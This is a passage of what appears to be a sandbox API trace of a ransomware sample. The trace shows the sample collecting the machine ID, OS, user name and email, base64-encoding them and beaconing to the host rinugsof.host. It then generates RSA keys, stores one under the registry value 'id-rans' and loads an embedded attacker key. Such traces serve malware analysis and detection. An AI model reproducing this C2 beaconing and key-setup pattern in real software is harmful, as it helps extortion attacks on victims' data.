returned="12781717671972518758" [0023.454] lstrcatW (in: lpString1="12781717671972518758", lpString2=";" | out: lpString1="12781717671972518758;") returned="12781717671972518758;" [0023.454] lstrcatW (in: lpString1="12781717671972518758;", lpString2="Windows 7 Professional" | out: lpString1="12781717671972518758;Windows 7 Professional") returned="12781717671972518758;Windows 7 Professional" [0023.454] lstrcatW (in: lpString1="12781717671972518758;Windows 7 Professional", lpString2=" UserName: " | out: lpString1="12781717671972518758;Windows 7 Professional UserName: ") returned="12781717671972518758;Windows 7 Professional UserName: " [0023.454] lstrcatW (in: lpString1="12781717671972518758;Windows 7 Professional UserName: ", lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz") returned="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz" [0023.454] lstrcatW (in: lpString1="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz", lpString2=";" | out: lpString1="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;") returned="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;" [0023.454] lstrcatW (in: lpString1="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;", lpString2="ex_parvis@aol.com" | out: lpString1="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;ex_parvis@aol.com") returned="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;ex_parvis@aol.com" [0023.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;ex_parvis@aol.com", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0023.454] VirtualAlloc (lpAddress=0x0, dwSize=0x5d, flAllocationType=0x3000, flProtect=0x4) returned 0x1b0000 [0023.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;ex_parvis@aol.com", cchWideChar=-1, lpMultiByteStr=0x1b0000, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;ex_parvis@aol.com", lpUsedDefaultChar=0x0) returned 93 [0023.455] CryptBinaryToStringW (in: pbBinary=0x1b0000, cbBinary=0x5d, dwFlags=0x80000001, pszString=0x0, pcchString=0x18ff2c | out: pszString=0x0, pcchString=0x18ff2c) returned 1 [0023.455] VirtualAlloc (lpAddress=0x0, dwSize=0x7f, flAllocationType=0x3000, flProtect=0x4) returned 0x1c0000 [0023.456] CryptBinaryToStringW (in: pbBinary=0x1b0000, cbBinary=0x5d, dwFlags=0x80000001, pszString=0x1c0000, pcchString=0x18ff2c | out: pszString="MTI3ODE3MTc2NzE5NzI1MTg3NTg7V2luZG93cyA3IFByb2Zlc3Npb25hbCBVc2Vy\nTmFtZTogNXA1TnJHSm4walMgSEFMUG1jeHo7ZXhfcGFydmlzQGFvbC5jb20A\n", pcchString=0x18ff2c) returned 1 [0023.456] OpenMutexW (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="12781717671972518758") returned 0x0 [0023.456] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="12781717671972518758") returned 0xb8 [0023.456] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x18ff14 | out: phkResult=0x18ff14*=0xc0) returned 0x0 [0023.456] VirtualAlloc (lpAddress=0x0, dwSize=0x2000, flAllocationType=0x3000, flProtect=0x4) returned 0x1d0000 [0023.456] RegQueryValueExW (in: hKey=0xc0, lpValueName="id-rans", lpReserved=0x0, lpType=0x0, lpData=0x1d0000, lpcbData=0x18fed0*=0x2000 | out: lpType=0x0, lpData=0x1d0000, lpcbData=0x18fed0*=0x2000) returned 0x2 [0023.456] RegCloseKey (hKey=0xc0) returned 0x0 [0023.456] VirtualFree (lpAddress=0x1d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0023.456] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x301d70 [0023.456] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x301100 [0023.457] InternetOpenW (lpszAgent="Random String", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0026.268] InternetConnectW (hInternet=0xcc0004, lpszServerName="rinugsof.host", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0026.274] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x110) returned 0x30d7b0 [0026.274] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x196) returned 0x30d8c8 [0026.274] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d7b0 | out: hHeap=0x2e0000) returned 1 [0026.274] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="senior?bs=MTI3ODE3MTc2NzE5NzI1MTg3NTg7V2luZG93cyA3IFByb2Zlc3Npb25hbCBVc2Vy\nTmFtZTogNXA1TnJHSm4walMgSEFMUG1jeHo7ZXhfcGFydmlzQGFvbC5jb20A\n", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x18ddf8*="text/*", dwFlags=0x80000, dwContext=0x1) returned 0xcc000c [0026.277] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0052.490] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x80000016, lpBuffer=0x0, lpdwBufferLength=0x18d998, lpdwIndex=0x0 | out: lpBuffer=0x0, lpdwBufferLength=0x18d998, lpdwIndex=0x0) returned 0 [0052.490] GetLastError () returned 0x7a [0052.490] GetLastError () returned 0x7a [0052.490] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1b2) returned 0x319788 [0052.490] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x80000016, lpBuffer=0x319788, lpdwBufferLength=0x18d998, lpdwIndex=0x0 | out: lpBuffer=0x319788*, lpdwBufferLength=0x18d998*=0x1b0, lpdwIndex=0x0) returned 1 [0052.491] OutputDebugStringW (lpOutputString="GET /senior?bs=MTI3ODE3MTc2NzE5NzI1MTg3NTg7V2luZG93cyA3IFByb2Zlc3Npb25hbCBVc2VyTmFtZTogNXA1TnJHSm4walMgSEFMUG1jeHo7ZXhfcGFydmlzQGFvbC5jb20A HTTP/1.1\r\nAccept: text/*\r\nUser-Agent: Random String\r\nHost: rinugsof.host\r\n\r\n") [0052.494] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319788 | out: hHeap=0x2e0000) returned 1 [0052.494] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0052.494] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0052.494] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d8c8 | out: hHeap=0x2e0000) returned 1 [0052.494] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0052.494] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x301100 | out: hHeap=0x2e0000) returned 1 [0052.494] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x301d70 | out: hHeap=0x2e0000) returned 1 [0052.494] Sleep (dwMilliseconds=0x3e8) [0053.498] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x301d70 [0053.498] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x301100 [0053.498] InternetOpenW (lpszAgent="Random String", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0053.499] InternetConnectW (hInternet=0xcc0004, lpszServerName="rinugsof.host", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0053.499] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x110) returned 0x30d650 [0053.499] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x196) returned 0x32f868 [0053.499] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d650 | out: hHeap=0x2e0000) returned 1 [0053.499] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="senior?bs=MTI3ODE3MTc2NzE5NzI1MTg3NTg7V2luZG93cyA3IFByb2Zlc3Npb25hbCBVc2Vy\nTmFtZTogNXA1TnJHSm4walMgSEFMUG1jeHo7ZXhfcGFydmlzQGFvbC5jb20A\n", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x18ddf8*="text/*", dwFlags=0x80000, dwContext=0x1) returned 0xcc000c [0053.500] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0074.546] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x80000016, lpBuffer=0x0, lpdwBufferLength=0x18d998, lpdwIndex=0x0 | out: lpBuffer=0x0, lpdwBufferLength=0x18d998, lpdwIndex=0x0) returned 0 [0074.547] GetLastError () returned 0x7a [0074.547] GetLastError () returned 0x7a [0074.547] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1b2) returned 0x30d650 [0074.547] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x80000016, lpBuffer=0x30d650, lpdwBufferLength=0x18d998, lpdwIndex=0x0 | out: lpBuffer=0x30d650*, lpdwBufferLength=0x18d998*=0x1b0, lpdwIndex=0x0) returned 1 [0074.547] OutputDebugStringW (lpOutputString="GET /senior?bs=MTI3ODE3MTc2NzE5NzI1MTg3NTg7V2luZG93cyA3IFByb2Zlc3Npb25hbCBVc2VyTmFtZTogNXA1TnJHSm4walMgSEFMUG1jeHo7ZXhfcGFydmlzQGFvbC5jb20A HTTP/1.1\r\nAccept: text/*\r\nUser-Agent: Random String\r\nHost: rinugsof.host\r\n\r\n") [0074.548] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d650 | out: hHeap=0x2e0000) returned 1 [0074.548] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0074.548] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0074.548] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f868 | out: hHeap=0x2e0000) returned 1 [0074.548] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0074.548] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x301100 | out: hHeap=0x2e0000) returned 1 [0074.548] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x301d70 | out: hHeap=0x2e0000) returned 1 [0074.548] Sleep (dwMilliseconds=0x3e8) [0075.556] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x301d70 [0075.557] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x301100 [0075.557] InternetOpenW (lpszAgent="Random String", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0075.557] InternetConnectW (hInternet=0xcc0004, lpszServerName="rinugsof.host", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0075.558] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x110) returned 0x32f868 [0075.558] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x196) returned 0x30d3d8 [0075.558] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f868 | out: hHeap=0x2e0000) returned 1 [0075.558] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="senior?bs=MTI3ODE3MTc2NzE5NzI1MTg3NTg7V2luZG93cyA3IFByb2Zlc3Npb25hbCBVc2Vy\nTmFtZTogNXA1TnJHSm4walMgSEFMUG1jeHo7ZXhfcGFydmlzQGFvbC5jb20A\n", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x18ddf8*="text/*", dwFlags=0x80000, dwContext=0x1) returned 0xcc000c [0075.558] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0096.587] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x80000016, lpBuffer=0x0, lpdwBufferLength=0x18d998, lpdwIndex=0x0 | out: lpBuffer=0x0, lpdwBufferLength=0x18d998, lpdwIndex=0x0) returned 0 [0096.587] GetLastError () returned 0x7a [0096.587] GetLastError () returned 0x7a [0096.587] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1b2) returned 0x32f868 [0096.587] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x80000016, lpBuffer=0x32f868, lpdwBufferLength=0x18d998, lpdwIndex=0x0 | out: lpBuffer=0x32f868*, lpdwBufferLength=0x18d998*=0x1b0, lpdwIndex=0x0) returned 1 [0096.587] OutputDebugStringW (lpOutputString="GET /senior?bs=MTI3ODE3MTc2NzE5NzI1MTg3NTg7V2luZG93cyA3IFByb2Zlc3Npb25hbCBVc2VyTmFtZTogNXA1TnJHSm4walMgSEFMUG1jeHo7ZXhfcGFydmlzQGFvbC5jb20A HTTP/1.1\r\nAccept: text/*\r\nUser-Agent: Random String\r\nHost: rinugsof.host\r\n\r\n") [0096.588] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f868 | out: hHeap=0x2e0000) returned 1 [0096.588] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0096.588] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0096.588] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d3d8 | out: hHeap=0x2e0000) returned 1 [0096.588] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0096.588] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x301100 | out: hHeap=0x2e0000) returned 1 [0096.589] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x301d70 | out: hHeap=0x2e0000) returned 1 [0096.589] Sleep (dwMilliseconds=0x3e8) [0097.599] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.599] CryptAcquireContextW (in: phProv=0x18ff08, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18ff08*=0x328578) returned 1 [0097.602] CryptGenKey (in: hProv=0x328578, Algid=0x1, dwFlags=0x8000001, phKey=0x18fef8 | out: phKey=0x18fef8*=0x317348) returned 1 [0098.186] CryptExportKey (in: hKey=0x317348, hExpKey=0x0, dwBlobType=0x7, dwFlags=0x0, pbData=0x0, pdwDataLen=0x18ff38 | out: pbData=0x0*, pdwDataLen=0x18ff38*=0x494) returned 1 [0098.186] LocalAlloc (uFlags=0x0, uBytes=0x494) returned 0x30dd50 [0098.186] CryptExportKey (in: hKey=0x317348, hExpKey=0x0, dwBlobType=0x7, dwFlags=0x0, pbData=0x30dd50, pdwDataLen=0x18ff38 | out: pbData=0x30dd50*, pdwDataLen=0x18ff38*=0x494) returned 1 [0098.187] CryptEncodeObjectEx (in: dwCertEncodingType=0x10001, lpszStructType=0x2b, pvStructInfo=0x30dd50, dwFlags=0x0, pEncodePara=0x0, pvEncoded=0x0, pcbEncoded=0x18ff38 | out: pvEncoded=0x0, pcbEncoded=0x18ff38) returned 1 [0098.200] LocalAlloc (uFlags=0x0, uBytes=0x4a7) returned 0x3407c8 [0098.200] CryptEncodeObjectEx (in: dwCertEncodingType=0x10001, lpszStructType=0x2b, pvStructInfo=0x30dd50, dwFlags=0x0, pEncodePara=0x0, pvEncoded=0x3407c8, pcbEncoded=0x18ff38 | out: pvEncoded=0x3407c8, pcbEncoded=0x18ff38) returned 1 [0098.200] CryptExportPublicKeyInfo (in: hCryptProvOrNCryptKey=0x328578, dwKeySpec=0x1, dwCertEncodingType=0x1, pInfo=0x0, pcbInfo=0x18fef0 | out: pInfo=0x0, pcbInfo=0x18fef0) returned 1 [0098.406] GetProcessHeap () returned 0x2e0000 [0098.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x13e) returned 0x333d90 [0098.406] CryptExportPublicKeyInfo (in: hCryptProvOrNCryptKey=0x328578, dwKeySpec=0x1, dwCertEncodingType=0x1, pInfo=0x333d90, pcbInfo=0x18fef0 | out: pInfo=0x333d90, pcbInfo=0x18fef0) returned 1 [0098.406] CryptEncodeObject (in: dwCertEncodingType=0x1, lpszStructType=0x8, pvStructInfo=0x333d90, pbEncoded=0x0, pcbEncoded=0x18ff1c | out: pbEncoded=0x0, pcbEncoded=0x18ff1c) returned 1 [0098.407] GetProcessHeap () returned 0x2e0000 [0098.407] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x126) returned 0x32f868 [0098.407] CryptEncodeObject (in: dwCertEncodingType=0x1, lpszStructType=0x8, pvStructInfo=0x333d90, pbEncoded=0x32f868, pcbEncoded=0x18ff1c | out: pbEncoded=0x32f868, pcbEncoded=0x18ff1c) returned 1 [0098.407] CryptBinaryToStringW (in: pbBinary=0x32f868, cbBinary=0x126, dwFlags=0x40000001, pszString=0x0, pcchString=0x18ff2c | out: pszString=0x0, pcchString=0x18ff2c) returned 1 [0098.408] GetProcessHeap () returned 0x2e0000 [0098.408] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x312) returned 0x336bc8 [0098.408] CryptBinaryToStringW (in: pbBinary=0x32f868, cbBinary=0x126, dwFlags=0x40000001, pszString=0x336bc8, pcchString=0x18ff2c | out: pszString="MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzWRInN0cSgCIpzWwVRnVWvdlSEUNe0d8YAPsHgqkRU5urnXPNU9SmB4OZ+8+3Hcg+gHMZeHpgttWvXYE53tXBDyfpFxRnUIU6kHANsqHSSUdqmIsa9/ljtvDSdrkM2qi6gZC57hEGjJfSouA3zhuLGyqsdZC3u/B0cC2p3Od3Y07JVzNgiLWyLv/p4RVCGAntyCDYegqh0HKLuUJ6qV25BQDicVl8GsgUTQ0pfQ4c1Yq2oRt2iUAEv8yEoJ940mIBIom//X8+Ess4MjyNi6f9QzpPc0fRYgJ5jlZOYL3hohK+85ovOUVWr0And1By06oJBkPkwb0BkgFdHl2l94DnwIDAQAB", pcchString=0x18ff2c) returned 1 [0098.408] lstrlenW (lpString="-----END PUBLIC KEY-----") returned 24 [0098.408] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----") returned 26 [0098.408] GetProcessHeap () returned 0x2e0000 [0098.408] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x384) returned 0x344398 [0098.408] lstrcpyW (in: lpString1=0x344398, lpString2="-----BEGIN PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY-----" [0098.408] lstrcatW (in: lpString1="-----BEGIN PUBLIC KEY-----", lpString2="MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzWRInN0cSgCIpzWwVRnVWvdlSEUNe0d8YAPsHgqkRU5urnXPNU9SmB4OZ+8+3Hcg+gHMZeHpgttWvXYE53tXBDyfpFxRnUIU6kHANsqHSSUdqmIsa9/ljtvDSdrkM2qi6gZC57hEGjJfSouA3zhuLGyqsdZC3u/B0cC2p3Od3Y07JVzNgiLWyLv/p4RVCGAntyCDYegqh0HKLuUJ6qV25BQDicVl8GsgUTQ0pfQ4c1Yq2oRt2iUAEv8yEoJ940mIBIom//X8+Ess4MjyNi6f9QzpPc0fRYgJ5jlZOYL3hohK+85ovOUVWr0And1By06oJBkPkwb0BkgFdHl2l94DnwIDAQAB" | out: lpString1="-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzWRInN0cSgCIpzWwVRnVWvdlSEUNe0d8YAPsHgqkRU5urnXPNU9SmB4OZ+8+3Hcg+gHMZeHpgttWvXYE53tXBDyfpFxRnUIU6kHANsqHSSUdqmIsa9/ljtvDSdrkM2qi6gZC57hEGjJfSouA3zhuLGyqsdZC3u/B0cC2p3Od3Y07JVzNgiLWyLv/p4RVCGAntyCDYegqh0HKLuUJ6qV25BQDicVl8GsgUTQ0pfQ4c1Yq2oRt2iUAEv8yEoJ940mIBIom//X8+Ess4MjyNi6f9QzpPc0fRYgJ5jlZOYL3hohK+85ovOUVWr0And1By06oJBkPkwb0BkgFdHl2l94DnwIDAQAB") returned="-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzWRInN0cSgCIpzWwVRnVWvdlSEUNe0d8YAPsHgqkRU5urnXPNU9SmB4OZ+8+3Hcg+gHMZeHpgttWvXYE53tXBDyfpFxRnUIU6kHANsqHSSUdqmIsa9/ljtvDSdrkM2qi6gZC57hEGjJfSouA3zhuLGyqsdZC3u/B0cC2p3Od3Y07JVzNgiLWyLv/p4RVCGAntyCDYegqh0HKLuUJ6qV25BQDicVl8GsgUTQ0pfQ4c1Yq2oRt2iUAEv8yEoJ940mIBIom//X8+Ess4MjyNi6f9QzpPc0fRYgJ5jlZOYL3hohK+85ovOUVWr0And1By06oJBkPkwb0BkgFdHl2l94DnwIDAQAB" [0098.408] lstrcatW (in: lpString1="-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzWRInN0cSgCIpzWwVRnVWvdlSEUNe0d8YAPsHgqkRU5urnXPNU9SmB4OZ+8+3Hcg+gHMZeHpgttWvXYE53tXBDyfpFxRnUIU6kHANsqHSSUdqmIsa9/ljtvDSdrkM2qi6gZC57hEGjJfSouA3zhuLGyqsdZC3u/B0cC2p3Od3Y07JVzNgiLWyLv/p4RVCGAntyCDYegqh0HKLuUJ6qV25BQDicVl8GsgUTQ0pfQ4c1Yq2oRt2iUAEv8yEoJ940mIBIom//X8+Ess4MjyNi6f9QzpPc0fRYgJ5jlZOYL3hohK+85ovOUVWr0And1By06oJBkPkwb0BkgFdHl2l94DnwIDAQAB", lpString2="-----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzWRInN0cSgCIpzWwVRnVWvdlSEUNe0d8YAPsHgqkRU5urnXPNU9SmB4OZ+8+3Hcg+gHMZeHpgttWvXYE53tXBDyfpFxRnUIU6kHANsqHSSUdqmIsa9/ljtvDSdrkM2qi6gZC57hEGjJfSouA3zhuLGyqsdZC3u/B0cC2p3Od3Y07JVzNgiLWyLv/p4RVCGAntyCDYegqh0HKLuUJ6qV25BQDicVl8GsgUTQ0pfQ4c1Yq2oRt2iUAEv8yEoJ940mIBIom//X8+Ess4MjyNi6f9QzpPc0fRYgJ5jlZOYL3hohK+85ovOUVWr0And1By06oJBkPkwb0BkgFdHl2l94DnwIDAQAB-----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzWRInN0cSgCIpzWwVRnVWvdlSEUNe0d8YAPsHgqkRU5urnXPNU9SmB4OZ+8+3Hcg+gHMZeHpgttWvXYE53tXBDyfpFxRnUIU6kHANsqHSSUdqmIsa9/ljtvDSdrkM2qi6gZC57hEGjJfSouA3zhuLGyqsdZC3u/B0cC2p3Od3Y07JVzNgiLWyLv/p4RVCGAntyCDYegqh0HKLuUJ6qV25BQDicVl8GsgUTQ0pfQ4c1Yq2oRt2iUAEv8yEoJ940mIBIom//X8+Ess4MjyNi6f9QzpPc0fRYgJ5jlZOYL3hohK+85ovOUVWr0And1By06oJBkPkwb0BkgFdHl2l94DnwIDAQAB-----END PUBLIC KEY-----" [0098.408] GetProcessHeap () returned 0x2e0000 [0098.408] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f868 | out: hHeap=0x2e0000) returned 1 [0098.408] GetProcessHeap () returned 0x2e0000 [0098.408] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x333d90 | out: hHeap=0x2e0000) returned 1 [0098.408] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18ff20 | out: phkResult=0x18ff20*=0x36c) returned 0x0 [0098.408] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzWRInN0cSgCIpzWwVRnVWvdlSEUNe0d8YAPsHgqkRU5urnXPNU9SmB4OZ+8+3Hcg+gHMZeHpgttWvXYE53tXBDyfpFxRnUIU6kHANsqHSSUdqmIsa9/ljtvDSdrkM2qi6gZC57hEGjJfSouA3zhuLGyqsdZC3u/B0cC2p3Od3Y07JVzNgiLWyLv/p4RVCGAntyCDYegqh0HKLuUJ6qV25BQDicVl8GsgUTQ0pfQ4c1Yq2oRt2iUAEv8yEoJ940mIBIom//X8+Ess4MjyNi6f9QzpPc0fRYgJ5jlZOYL3hohK+85ovOUVWr0And1By06oJBkPkwb0BkgFdHl2l94DnwIDAQAB-----END PUBLIC KEY-----") returned 442 [0098.408] RegSetValueExW (in: hKey=0x36c, lpValueName="id-rans", Reserved=0x0, dwType=0x1, lpData="-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzWRInN0cSgCIpzWwVRnVWvdlSEUNe0d8YAPsHgqkRU5urnXPNU9SmB4OZ+8+3Hcg+gHMZeHpgttWvXYE53tXBDyfpFxRnUIU6kHANsqHSSUdqmIsa9/ljtvDSdrkM2qi6gZC57hEGjJfSouA3zhuLGyqsdZC3u/B0cC2p3Od3Y07JVzNgiLWyLv/p4RVCGAntyCDYegqh0HKLuUJ6qV25BQDicVl8GsgUTQ0pfQ4c1Yq2oRt2iUAEv8yEoJ940mIBIom//X8+Ess4MjyNi6f9QzpPc0fRYgJ5jlZOYL3hohK+85ovOUVWr0And1By06oJBkPkwb0BkgFdHl2l94DnwIDAQAB-----END PUBLIC KEY-----", cbData=0x376 | out: lpData="-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzWRInN0cSgCIpzWwVRnVWvdlSEUNe0d8YAPsHgqkRU5urnXPNU9SmB4OZ+8+3Hcg+gHMZeHpgttWvXYE53tXBDyfpFxRnUIU6kHANsqHSSUdqmIsa9/ljtvDSdrkM2qi6gZC57hEGjJfSouA3zhuLGyqsdZC3u/B0cC2p3Od3Y07JVzNgiLWyLv/p4RVCGAntyCDYegqh0HKLuUJ6qV25BQDicVl8GsgUTQ0pfQ4c1Yq2oRt2iUAEv8yEoJ940mIBIom//X8+Ess4MjyNi6f9QzpPc0fRYgJ5jlZOYL3hohK+85ovOUVWr0And1By06oJBkPkwb0BkgFdHl2l94DnwIDAQAB-----END PUBLIC KEY-----") returned 0x0 [0098.409] RegCloseKey (hKey=0x36c) returned 0x0 [0098.409] GetProcessHeap () returned 0x2e0000 [0098.409] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344398 | out: hHeap=0x2e0000) returned 1 [0098.409] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxahGr7G/MncVAccujk8XgN+9bO+9ipkfpIyXKjybepSpWscLPA3jsu5NLSnXyV9+Qvg28S0qqs/B/8dKkLE/jYkeDRRLIf4OFPrXPwZa2N190vxkvzHQajTfj56IxVPK5st+CAGapteLB/HyaT/hptG6ZvBbM4+uDYM+VkwTRhxD+p8KeTvZbeZilSyDK4l2H1q1Z+kKrJAxAZ6rZ9dU9PtiB+0meDcy6W6BUkz/+LflRGrVueTINDXaGdOg/7mgd2jVCL+v9nBCoNhP6ty40TnbyZGc4ta8EUJ7nk6sVTzwEXqH4ZEh1+6tAk9MwyL+xeeYWJNAFzChshRbSJ1rmwIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x18de4c, pcbBinary=0x18fed4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x18de4c, pcbBinary=0x18fed4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0098.410] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x18de4c, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x18feec, pcbStructInfo=0x18fe08 | out: pvStructInfo=0x18feec, pcbStructInfo=0x18fe08) returned 1 [0098.411] 